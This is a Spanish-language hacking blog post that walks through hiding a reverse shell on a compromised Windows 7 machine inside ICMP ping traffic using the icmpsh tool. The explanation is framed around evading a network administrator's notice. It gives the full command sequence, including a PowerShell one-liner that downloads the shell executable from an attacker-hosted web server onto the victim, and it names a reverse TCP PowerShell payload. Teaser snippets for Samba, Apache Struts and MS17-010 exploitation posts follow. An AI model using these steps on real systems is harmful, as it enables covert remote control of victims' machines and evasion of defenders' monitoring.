Ocultando una Shell con el protocolo ICMP.

En este post hablaremos un poco de la post-explotación, con el cual trataremos de ocultar una shell que hemos obtenido en una victima encapsulando los paquetes bajo el protocolo ICMP, lo que hará que los comandos que se lancen desde el atacante a la victima sean vistos como uno o varios Ping.

Para ello, vamos a suponer que explotamos un Windows 7. (Puedes ver como hacerlo en este post) y obtuvimos una shell.


Ahora vamos a descargar los paquetes necesarios y a preparar nuestro entorno.

Descargar icmpsh


git clone https://github.com/inquisb/icmpsh.git

Ahora vamos a desactivar las respuestas ICMP para el sistema operativo (Atacante).


sysctl -w net.ipv4.icmp_echo_ignore_all=1

Ahora debemos entrar a la carpeta icmpsh y ejecutar el script


python icmpsh_m.py IPATACANTE IPVICTIMA

Al momento de ejecutarse, el script estará esperando la conexión desde la victima, y para lograr que se conecte tenemos dos métodos.

Metodo 1: (Ejecutable).

Dentro de la carpeta de icmpsh existe un ejecutable llamado icmpsh.exe el cual debemos transferir a la victima, una de las formas más sencillas puede ser a travez de http con un comando de powershell.

Debemos ejecutar un simple servidor web, esto lo podemos hacer con python y el comando: (Dentro de la carpeta icmpsh).


python -m SimpleHTTPServer 80

Ahora, debemos ir a la shell de la victima y descargar el archivo con powershell.(debemos cambiar la ip donde esté alojado el archivo).


powershell -c (new-object System.Net.WebClient).DownloadFile('http://192.168.0.21/icmpsh.exe','C:\Windows\system32\icmpsh.exe')

Luego de que se haya descargado, ejecutamos el exe indicando la ip del atacante.


icmpsh.exe -t 192.168.0.21

Ahora, nuestro script recibe una shell.


Ahora, la magia radica en que si capturamos los paquetes que van de una maquina a otra cuando ejecutamos un comando nos muestra lo siguiente:


Como se puede ver, los comandos viajan como si fueran peticiones y respuestas de ping. :) Lo que hace que un administrador de redes no se fije mucho en esto.
Metodo 2 (Powershell)

Ya vimos como ejecutar la shell subiendo un archivo a la victima, ahora veremos como hacerlo directamente usando powershell.

Todo el procedimiento es el mismo, hasta que debemos hacer que la victima se conecte al atacante, en este caso no vamos a descargar nada. Solo necesitamos la shell que ya obtuvimos por otro método. Pero vamos a usar otro payload el cual podemos usar para cargar powershell y su modulo correspondiente.

Debemos poner nuestro script a escuchar igual que lo hicimos en el método pasado y ejecutamos powershell en la maquina victima.


Payload:  windows/x64/powershell_reverse_tcp



Comentarios

Publicar un comentario

Entradas más populares de este blog

Obteniendo Shell en Linux por medio de Samba

Imagen
El día de hoy veremos algunas formas para ejecutar código remoto en un Linux mediante el servicio Samba gracias a el relativamente nuevo CVE:  2017-7494. En resumen, dicha volunerabilidad permite a un atacante subir una librería a una carpeta compartida escribible y permite que el servidor la ejecute, obteniendo shell o cualquier otro comando. Lo interesante de esta vulnerabilidad es que afecta cualquier versión (no parcheada) de Samba, a partir de 3.5.0 y a continuación probaremos la versión 4.5.9 en Ubuntu 12.06 aunque la versión de Linux realmente no importa. Para comenzar, explicaremos como podemos instalar un servicio Samba vulnerable para nuestras pruebas. Para ello, como lo dije antes, probaremos la versión 4.5.9 que podremos conseguir en la siguiente dirección. https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz Una vez descargado podremos compilarlo. tar -xvf samba-4.5.9.tar.gz cd samba-4.5.9/ ./configure --sbindir = /sbin/ --sysconfdir = /etc/samba...
Leer más

Apache Struts ejecución de código remoto.

Imagen
En este post, haremos una prueba de concepto en la cual pondremos a prueba una vulnerabilidad recientemente publicada, la cual afecta a varias versiones recientes de Apache Struts (2.3.5 < 2.3.31 / 2.5 < 2.5.10), la cual permite la ejecución de código remoto en la maquina vulnerable. Antes que nada, ¿Que es Apache Struts?. bueno, en si mismo, es un Framework de desarrollo que permite crear aplicaciones web en Java, la cual soporta REST, AJAX y JSON. Además es importante recalcar que una de las versiones vulnerables la 2.5.10, y la versión actual es 2.5.10.1 (parchada). Teniendo en cuenta esto, tendremos entonces que instalar un servicio web (Como tomcat) sobre el cual podemos montar una aplicación .war creada con Apache Struts. Por suerte, se pueden descargar ejemplos de la red. Aunque Tomcat puede ser instalado en Windows, Linux y otros.. vamos a probarlo en Linux/Ubuntu. Luego de tener el sistema, instalamos los paquetes necesarios. apt search tomcat apt install ...
Leer más

Explotación de vulnerabilidad MS17-010

Imagen
Lo interesante de éste post es que uno de los métodos que explicaremos hace la explotación de ms17-010 completamente desde un celular obteniendo shell del windows explotado, ésta es  la vulnerabilidad que usa el ransomware wannacry El día de hoy probaremos 3 métodos diferentes para explotar la ya conocida vulnerabilidad de SMB en Windows catalogada como MS17-010 , CVE-2017-0143 con la cual obtendremos una shell remota de un sistema Windows 7 X64 bits.(También funciona para explotar Windows 2008 y otros de 64 bits) Los 3 métodos diferentes que usaremos son: 1 - Explotación de la vulnerabilidad usando el exploit publicado en Exploit-db   2-  Explotación de la vulnerabilidad usando el exploit desde el celular 3 - Explotación de la vulnerabilidad usando el exploit de Metasploit. Los anteriores son mas sencillos de usar que el procedimiento original publicado para explotar la vulnerabilidad. (Con Fuzzbunch y las herramientas de los ShadowBrokers). P...
Leer más